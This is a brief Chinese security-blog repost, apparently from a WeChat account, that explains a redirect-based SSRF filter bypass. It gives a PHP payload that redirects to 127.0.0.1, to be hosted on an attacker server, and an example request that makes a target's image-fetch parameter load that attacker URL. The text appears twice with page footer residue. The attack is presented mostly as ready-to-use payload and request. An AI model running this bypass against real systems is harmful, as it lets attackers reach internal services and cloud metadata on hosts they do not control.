如果本地主机和元数据调用受到限制,将此Payload保存为攻击者服务器中。
header('location: http://127.0.0.1');
http://target.com/image?url=http://attaker/1.php
原文始发于微信公众号(Khan安全攻防实验室):重定向 SSRF 绕过
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
聚合网络安全,存储安全技术文章,融合安全最新讯息
如果本地主机和元数据调用受到限制,将此Payload保存为攻击者服务器中。
<?php
header('location: http://127.0.0.1');
?>
http://target.com/image?url=http://attaker/1.php
原文始发于微信公众号(Khan安全攻防实验室):重定向 SSRF 绕过
评论